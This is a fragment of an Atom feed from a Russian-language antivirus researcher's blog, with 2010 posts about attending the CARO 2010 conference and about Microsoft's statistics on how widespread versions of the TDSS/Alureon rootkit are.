Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4122368342840916173</id><published>2010-05-28T11:43:00.000+04:00</published><updated>2010-05-28T11:56:28.805+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><title type='text'>CARO'2010: Day2</title><content type='html'>Заключительной день конференции был менее насыщенным. Хотя достойные доклады тоже были:&lt;br /&gt;- "&lt;a href="http://www.f-secure.com/weblog/archives/Armin_B_Monkeywrench.pdf"&gt;Detecting malicious web pages with MonkeyWrench&lt;/a&gt;"&lt;br /&gt;- "&lt;a href="Using Value Set Analysis for Classification of metamorphic Malware Samples"&gt;Using Value Set Analysis for Classification of metamorphic Malware Samples&lt;/a&gt;"&lt;br /&gt;В этот день ко мне доматались корейцы из компании &lt;a href="http://global.ahnlab.com/en/site/main/main.do"&gt;AhLab&lt;/a&gt;, которые всячески пытались от меня получить информацию о внутренних тулзах :)  &lt;br /&gt;&lt;object width="500" height="375"&gt;&lt;param name="flashvars" value="author=matros0ff&amp;mode=album&amp;effects=1&amp;time=5&amp;id=96351" /&gt;&lt;param name="bgcolor" value="#000000" /&gt;&lt;param name="movie" value="http://fotki.yandex.ru/swf/slideshow" /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;embed src="http://fotki.yandex.ru/swf/slideshow" allowFullScreen="true" width="500" height="375" flashvars="author=matros0ff&amp;mode=album&amp;effects=1&amp;time=5&amp;id=96351" type="application/x-shockwave-flash" bgcolor="#000000" /&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4122368342840916173?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4122368342840916173/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/05/caro2010-day2.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4122368342840916173'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4122368342840916173'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/05/caro2010-day2.html' title='CARO&apos;2010: Day2'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-1423146727282795259</id><published>2010-05-26T19:26:00.000+04:00</published><updated>2010-05-26T19:38:27.963+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><title type='text'>CARO'2010: Day1</title><content type='html'>Собственно сегодня с 9:00 уже начала свою работу конференция CARO'2010. Тема этой конференции "Большие числа". Речь идет о постоянном росте кол-ва вредоносных объектов, увлечения числа сигнатур и собственно размера самих антивирусных баз. Именно об этом сегодня много говорили, да и пожалуй завтра тоже продолжат :). Интересно, что самое большое число докладчиков на конференции представляют компанию Microsoft. А еще более интересно то, что доклады у них очень даже заслуживающие внимания. Частично презентации уже выложили &lt;a href="http://www.f-secure.com/weblog/archives/caro2010_slides.htm"&gt;здесь&lt;/a&gt;. &lt;br /&gt;&lt;object width="500" height="375"&gt;&lt;param name="flashvars" value="author=matros0ff&amp;mode=album&amp;effects=1&amp;time=5&amp;id=96301" /&gt;&lt;param name="bgcolor" value="#000000" /&gt;&lt;param name="movie" value="http://fotki.yandex.ru/swf/slideshow" /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;embed src="http://fotki.yandex.ru/swf/slideshow" allowFullScreen="true" width="500" height="375" flashvars="author=matros0ff&amp;mode=album&amp;effects=1&amp;time=5&amp;id=96301" type="application/x-shockwave-flash" bgcolor="#000000" /&gt;&lt;/object&gt;&lt;br /&gt;Пока на этом все, подробнее о докладах напишу в итоговом посте :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-1423146727282795259?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/1423146727282795259/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/05/caro2010-day1.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1423146727282795259'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1423146727282795259'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/05/caro2010-day1.html' title='CARO&apos;2010: Day1'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-203087301901907598</id><published>2010-05-24T12:35:00.000+04:00</published><updated>2010-05-24T12:57:24.304+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><title type='text'>CARO'2010</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_gn-7ejyJv08/S_o68FMuyTI/AAAAAAAAAnM/GZW7GrhdkJc/s1600/logo_caro.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 300px; height: 89px;" src="http://3.bp.blogspot.com/_gn-7ejyJv08/S_o68FMuyTI/AAAAAAAAAnM/GZW7GrhdkJc/s400/logo_caro.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5474753100884396338" /&gt;&lt;/a&gt;&lt;br /&gt;Завтра выдвигаюсь на конференцию &lt;a href="http://caro2010.org/"&gt;CARO'2010&lt;/a&gt;. В этом году она проходит в Хельсинки и организаторами выступают F-Secure. Достаточно много интересных докладов в &lt;a href="http://caro2010.org/program.html"&gt;программе&lt;/a&gt;, по итогам обязательно отпишу и расскажу как оно вообще было.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-203087301901907598?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/203087301901907598/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/05/caro2010.html#comment-form' title='Комментарии: 1'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/203087301901907598'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/203087301901907598'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/05/caro2010.html' title='CARO&apos;2010'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_gn-7ejyJv08/S_o68FMuyTI/AAAAAAAAAnM/GZW7GrhdkJc/s72-c/logo_caro.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-9033380950042436989</id><published>2010-05-04T19:41:00.000+04:00</published><updated>2010-05-24T12:35:23.210+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><title type='text'>Статистика распространенности различных версий TDSS</title><content type='html'>Недавно в сети появился &lt;a href="http://blogs.technet.com/mmpc/archive/2010/04/30/msrt-april-threat-reports-alureon.aspx"&gt;интересный отчет&lt;/a&gt; от MS о распространенности различных версий TDSS. Распространенность по версиям очевидна, самые популярные экземпляры относятся к последними модификациям этого зловреда.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_gn-7ejyJv08/S-BBh7C33ZI/AAAAAAAAAlo/YOwnG5Xp6yk/s1600/alureon-1.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 254px;" src="http://1.bp.blogspot.com/_gn-7ejyJv08/S-BBh7C33ZI/AAAAAAAAAlo/YOwnG5Xp6yk/s320/alureon-1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5467441998669012370" /&gt;&lt;/a&gt;&lt;br /&gt;Достаточное большое распространение имеют дроперы устанавливающие этого руткита в систему. Интересные данные по обнаруженным инцидентам на разных ОС семейства MS Windows:&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_gn-7ejyJv08/S-BCsgKjYzI/AAAAAAAAAlw/b7kLTvZDiBA/s1600/alureon-2.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 255px;" src="http://4.bp.blogspot.com/_gn-7ejyJv08/S-BCsgKjYzI/AAAAAAAAAlw/b7kLTvZDiBA/s320/alureon-2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5467443279943656242" /&gt;&lt;/a&gt;&lt;br /&gt;По количеству инцидентов по прежнему лидирует платформа WinXP, что в принципе очевидно. Причем среди этих инцидентов не малая доля приходится на пользователей XP SP2, по всей видимости это пользователи пиратских версий, иначе нельзя объяснить столь длительное игнорирование напоминаний об обновлении. Ну разве, что это все пользователи Soft-Ice :)&lt;br /&gt;Если говорить о региональной активности, то среди стран лидирует США, причем с громадным отрывом от остальных.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_gn-7ejyJv08/S-BEBOsGU9I/AAAAAAAAAl4/8MLEwRY7Cd8/s1600/alureon-3.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 309px;" src="http://1.bp.blogspot.com/_gn-7ejyJv08/S-BEBOsGU9I/AAAAAAAAAl4/8MLEwRY7Cd8/s320/alureon-3.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5467444735541400530" /&gt;&lt;/a&gt;&lt;br /&gt;Это можно объяснить наибольшей популярностью антивирусных продуктов от MS в этом регионе, хотя в целом активность этого руткита в США очень велика.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Update:&lt;/span&gt; Опубликован &lt;a href="http://blogs.technet.com/mmpc/archive/2010/05/21/msrt-may-threat-reports-and-alureon.aspx"&gt;обновленный вариант&lt;/a&gt; этой статистики за май. В объемах сильно подросла последняя модификация, а вот распространенность более старых версий, как и предполагалось, стремительно падает.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-9033380950042436989?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/9033380950042436989/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/05/tdss.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/9033380950042436989'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/9033380950042436989'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/05/tdss.html' title='Статистика распространенности различных версий TDSS'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gn-7ejyJv08/S-BBh7C33ZI/AAAAAAAAAlo/YOwnG5Xp6yk/s72-c/alureon-1.png' height='72' width='72'/><thr:total>0</thr:total></entry></feed>
